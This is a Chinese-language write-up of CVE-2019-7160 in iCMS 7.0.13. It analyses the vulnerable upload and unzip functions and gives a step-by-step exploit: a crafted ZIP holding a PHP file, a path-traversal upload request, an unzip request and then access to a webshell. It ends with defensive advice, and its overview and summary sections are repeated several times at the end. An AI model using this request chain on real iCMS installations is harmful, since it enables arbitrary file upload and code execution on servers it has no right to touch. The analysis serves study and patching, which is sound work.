iCMS 7.0.13 CVE-2019-7160 后台GETSHELL漏洞分析与利用<\/h1>

漏洞概述<\/h2>
CVE-2019-7160是iCMS 7.0.13版本中存在的一个后台getshell漏洞，攻击者需要先获取后台管理员权限，然后通过两个功能点的组合利用实现任意文件上传和代码执行。<\/p>

漏洞影响版本<\/h2>

iCMS 7.0.13及之前版本<\/li> <\/ul>

漏洞原理<\/h2>

该漏洞由两个关键功能点组合利用：<\/p>

do_IO()<\/code>函数允许上传ZIP文件到任意目录<\/li>

do_local_app()<\/code>函数对上传的ZIP文件进行解压，且不检查解压后的文件内容<\/li>
<\/ol>
环境准备<\/h2>

操作系统：OSX\/Linux\/Windows<\/li>
Web服务器：Apache\/Nginx<\/li>
PHP版本：PHP 7.x<\/li>
数据库：MySQL 5.7<\/li>
iCMS版本：7.0.13<\/li>
<\/ul>
漏洞详细分析<\/h2>
1. 文件上传功能分析<\/h3>
关键函数：do_IO()<\/code><\/h4>
public<\/span> function<\/span> do_IO<\/span>(){
<\/span><\/span>    files<\/span>::<\/span>$watermark_enable =<\/span> $_GET['watermark'<\/span>];
<\/span><\/span>    $udir =<\/span> iSecurity<\/span>::<\/span>escapeStr<\/span>($_GET['udir'<\/span>]);
<\/span><\/span>    $name =<\/span> iSecurity<\/span>::<\/span>escapeStr<\/span>($_GET['name'<\/span>]);
<\/span><\/span>    $ext =<\/span> iSecurity<\/span>::<\/span>escapeStr<\/span>($_GET['ext'<\/span>]);
<\/span><\/span>    
<\/span><\/span>    iFS<\/span>::<\/span>check_ext<\/span>($ext,0<\/span>) OR<\/span> iUI<\/span>::<\/span>json<\/span>(array<\/span>('state'<\/span>=><\/span>'ERROR'<\/span>,'msg'<\/span>=><\/span>'不允许的文件类型'<\/span>));
<\/span><\/span>    iFS<\/span>::<\/span>$ERROR_TYPE =<\/span> true<\/span>;
<\/span><\/span>    $F =<\/span> iFS<\/span>::<\/span>IO<\/span>($name,$udir,$ext);
<\/span><\/span>    $F ===<\/span>false<\/span> &&<\/span> iUI<\/span>::<\/span>json<\/span>(iFS<\/span>::<\/span>$ERROR);
<\/span><\/span>    iUI<\/span>::<\/span>json<\/span>(array<\/span>(
<\/span><\/span>        "value"<\/span> =><\/span> $F["path"<\/span>],
<\/span><\/span>        "url"<\/span> =><\/span> iFS<\/span>::<\/span>fp<\/span>($F['path'<\/span>],'+http'<\/span>),
<\/span><\/span>        "fid"<\/span> =><\/span> $F["fid"<\/span>],
<\/span><\/span>        "fileType"<\/span> =><\/span> $F["ext"<\/span>],
<\/span><\/span>        "image"<\/span> =><\/span> in_array<\/span>($F["ext"<\/span>],files<\/span>::<\/span>$IMG_EXT)?<\/span>1<\/span>:<\/span>0<\/span>,
<\/span><\/span>        "original"<\/span> =><\/span> $F["oname"<\/span>],
<\/span><\/span>        "state"<\/span> =><\/span> ($F['code'<\/span>]?<\/span>'SUCCESS'<\/span>:<\/span>$F['state'<\/span>])
<\/span><\/span>    ));
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>文件处理函数：iFS::IO()<\/code><\/h4>
public<\/span> static<\/span> function<\/span> IO<\/span>($FileName =<\/span> ''<\/span>, $udir =<\/span> ''<\/span>, $FileExt =<\/span> 'jpg'<\/span>,$type=<\/span>'3'<\/span>,$filedata=<\/span>null<\/span>) {
<\/span><\/span>    $filedata===<\/span>null<\/span> &&<\/span> $filedata =<\/span> file_get_contents<\/span>('php:\/\/input'<\/span>);
<\/span><\/span>    if<\/span> (empty<\/span>($filedata)) {
<\/span><\/span>        return<\/span> false<\/span>;
<\/span><\/span>    }
<\/span><\/span>    $fileMd5 =<\/span> md5<\/span>($filedata);
<\/span><\/span>    $FileName OR<\/span> $FileName =<\/span> $fileMd5;
<\/span><\/span>    $FileSize =<\/span> strlen<\/span>($filedata);
<\/span><\/span>    $FileExt =<\/span> self<\/span>::<\/span>valid_ext<\/span>($FileName.<\/span>$FileExt); \/\/判断文件类型
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    if<\/span> ($FileExt ===<\/span> false<\/span>) {
<\/span><\/span>        return<\/span> false<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    list<\/span>($RootPath, $FileDir) =<\/span> self<\/span>::<\/span>mk_udir<\/span>($udir,$fileMd5,$FileExt); \/\/ 文件保存目录方式
<\/span><\/span><\/span><\/span>    $FilePath =<\/span> $FileDir .<\/span> $FileName .<\/span> '.'<\/span> .<\/span> $FileExt;
<\/span><\/span>    $FileRootPath =<\/span> $RootPath .<\/span> $FileName .<\/span> '.'<\/span> .<\/span> $FileExt;
<\/span><\/span>    
<\/span><\/span>    self<\/span>::<\/span>write<\/span>($FileRootPath, $filedata);
<\/span><\/span>    $fid =<\/span> self<\/span>::<\/span>insert_filedata<\/span>(array<\/span>($FileName,''<\/span>,$FileDir,''<\/span>,$FileExt,$FileSize), $type);
<\/span><\/span>    self<\/span>::<\/span>hook<\/span>('upload'<\/span>,array<\/span>($FileRootPath,$FileExt));
<\/span><\/span>    
<\/span><\/span>    $value =<\/span> array<\/span>(
<\/span><\/span>        1<\/span>,$fid,$fileMd5,$FileSize,
<\/span><\/span>        ''<\/span>,$FileName,$FileName.<\/span>"."<\/span>.<\/span>$FileExt,
<\/span><\/span>        $FileDir,$FileExt,
<\/span><\/span>        $FileRootPath,$FilePath,$RootPath
<\/span><\/span>    );
<\/span><\/span>    return<\/span> self<\/span>::<\/span>_data<\/span>($value);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞点<\/strong>：<\/p>

通过udir<\/code>和name<\/code>参数可以控制文件保存路径<\/li>
虽然对文件扩展名有检查，但允许上传ZIP文件<\/li>
可以构造路径穿越将文件上传到任意目录<\/li>
<\/ul>
2. 文件解压功能分析<\/h3>
关键函数：do_local_app()<\/code><\/h4>
public<\/span> function<\/span> do_local_app<\/span>(){
<\/span><\/span>    $zipfile =<\/span> trim<\/span>($_POST['zipfile'<\/span>]);
<\/span><\/span>    echo<\/span> $zipfile;
<\/span><\/span>    if<\/span>(preg_match<\/span>("\/^iCMS\.APP\.(\w+)\-v\d+\.\d+\.\d+\.zip$\/"<\/span>, $zipfile,$match)){
<\/span><\/span>        apps_store<\/span>::<\/span>$zip_file =<\/span> iPATH<\/span>.<\/span>$zipfile;
<\/span><\/span>        apps_store<\/span>::<\/span>$msg_mode =<\/span> 'alert'<\/span>;
<\/span><\/span>        apps_store<\/span>::<\/span>install_app<\/span>($match[1<\/span>]);
<\/span><\/span>        iUI<\/span>::<\/span>success<\/span>('应用安装完成'<\/span>,'js:1'<\/span>);
<\/span><\/span>    }else<\/span>{
<\/span><\/span>        iUI<\/span>::<\/span>alert<\/span>('What the fuck!!'<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>解压函数：setup_zip()<\/code><\/h4>
public<\/span> static<\/span> function<\/span> setup_zip<\/span>() {
<\/span><\/span>    $zip_file =<\/span> self<\/span>::<\/span>$zip_file;
<\/span><\/span>    if<\/span>(!<\/span>file_exists<\/span>($zip_file)){
<\/span><\/span>        return<\/span> self<\/span>::<\/span>msg<\/span>("安装包不存在"<\/span>,false<\/span>);
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    iPHP<\/span>::<\/span>vendor<\/span>('PclZip'<\/span>);
<\/span><\/span>    $zip =<\/span> new<\/span> PclZip<\/span>($zip_file);
<\/span><\/span>    if<\/span> (false<\/span> ==<\/span> ($archive_files =<\/span> $zip-><\/span>extract<\/span>(PCLZIP_OPT_EXTRACT_AS_STRING<\/span>))) {
<\/span><\/span>        iFS<\/span>::<\/span>rm<\/span>($zip_file);
<\/span><\/span>        return<\/span> self<\/span>::<\/span>msg<\/span>("ZIP包错误"<\/span>,false<\/span>);
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    if<\/span> (0<\/span> ==<\/span> count<\/span>($archive_files)) {
<\/span><\/span>        iFS<\/span>::<\/span>rm<\/span>($zipfile);
<\/span><\/span>        return<\/span> self<\/span>::<\/span>msg<\/span>("空的ZIP文件"<\/span>,false<\/span>);
<\/span><\/span>    }
<\/span><\/span>    return<\/span> $archive_files;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞点<\/strong>：<\/p>

仅检查ZIP文件名格式，不检查内容<\/li>
解压时不限制解压路径<\/li>
可以解压包含PHP文件的ZIP包<\/li>
<\/ul>
漏洞利用步骤<\/h2>
1. 构造恶意ZIP文件<\/h3>
创建一个包含PHP代码的文件（如shell.php<\/code>），内容为：<\/p>
<?<\/span>php<\/span> phpinfo<\/span>(); ?><\/span>
<\/span><\/span><\/span><\/code><\/pre>将其压缩为ZIP文件，并命名为符合正则表达式的格式，例如：

iCMS.APP.test-v1.1.1.zip<\/code><\/p>
2. 上传ZIP文件<\/h3>
发送以下HTTP请求上传文件：<\/p>
POST \/icms\/admincp.php?app=files&do=IO&frame=iPHP&ext=zip&udir=..\/&name=..\/iCMS.APP.test-v1.1.1&watermark=false HTTP\/1.1
Host: target.com
Content-Type: application\/x-www-form-urlencoded
Content-Length: [length]
Cookie: [admin cookies]

[ZIP file binary data]
<\/code><\/pre>
参数说明<\/strong>：<\/p>

udir=..\/<\/code>：使用路径穿越将文件上传到根目录<\/li>
name=..\/iCMS.APP.test-v1.1.1<\/code>：控制文件名和路径<\/li>
ext=zip<\/code>：指定文件扩展名为zip<\/li>
<\/ul>
3. 解压ZIP文件<\/h3>
发送以下HTTP请求触发解压：<\/p>
POST \/icms\/admincp.php?app=apps_store&do=local_app HTTP\/1.1
Host: target.com
Content-Type: application\/x-www-form-urlencoded
Content-Length: [length]
Cookie: [admin cookies]

zipfile=iCMS.APP.test-v1.1.1.zip
<\/code><\/pre>
4. 访问Webshell<\/h3>
如果ZIP中包含shell.php<\/code>，解压后可通过以下URL访问：<\/p>
http:\/\/target.com\/shell.php
<\/code><\/pre>
防御措施<\/h2>

升级到最新版本的iCMS<\/li>
如果无法立即升级，可采取以下临时措施：

限制后台访问IP<\/li>
修改do_IO()<\/code>函数，严格限制上传路径<\/li>
修改do_local_app()<\/code>函数，增加对解压文件内容的检查<\/li>
<\/ul>
<\/li>
加强后台管理员密码复杂度<\/li>
定期审计系统日志<\/li>
<\/ol>
总结<\/h2>
CVE-2019-7160漏洞利用iCMS后台的两个功能点组合实现了getshell，需要管理员权限但危害严重。开发人员应重视文件上传和压缩包处理的权限控制和安全检查，避免类似漏洞的出现。<\/p>

iCMS 7.0.13 CVE-2019-7160 后台GETSHELL漏洞分析与利用<\/h1>

漏洞概述<\/h2> CVE-2019-7160是iCMS 7.0.13版本中存在的一个后台getshell漏洞，攻击者需要先获取后台管理员权限，然后通过两个功能点的组合利用实现任意文件上传和代码执行。<\/p>

漏洞详细分析<\/h2>

1. 文件上传功能分析<\/h3>

2. 文件解压功能分析<\/h3>

漏洞利用步骤<\/h2>

总结<\/h2> CVE-2019-7160漏洞利用iCMS后台的两个功能点组合实现了getshell，需要管理员权限但危害严重。开发人员应重视文件上传和压缩包处理的权限控制和安全检查，避免类似漏洞的出现。<\/p>

漏洞概述<\/h2>
CVE-2019-7160是iCMS 7.0.13版本中存在的一个后台getshell漏洞，攻击者需要先获取后台管理员权限，然后通过两个功能点的组合利用实现任意文件上传和代码执行。<\/p>

总结<\/h2>
CVE-2019-7160漏洞利用iCMS后台的两个功能点组合实现了getshell，需要管理员权限但危害严重。开发人员应重视文件上传和压缩包处理的权限控制和安全检查，避免类似漏洞的出现。<\/p>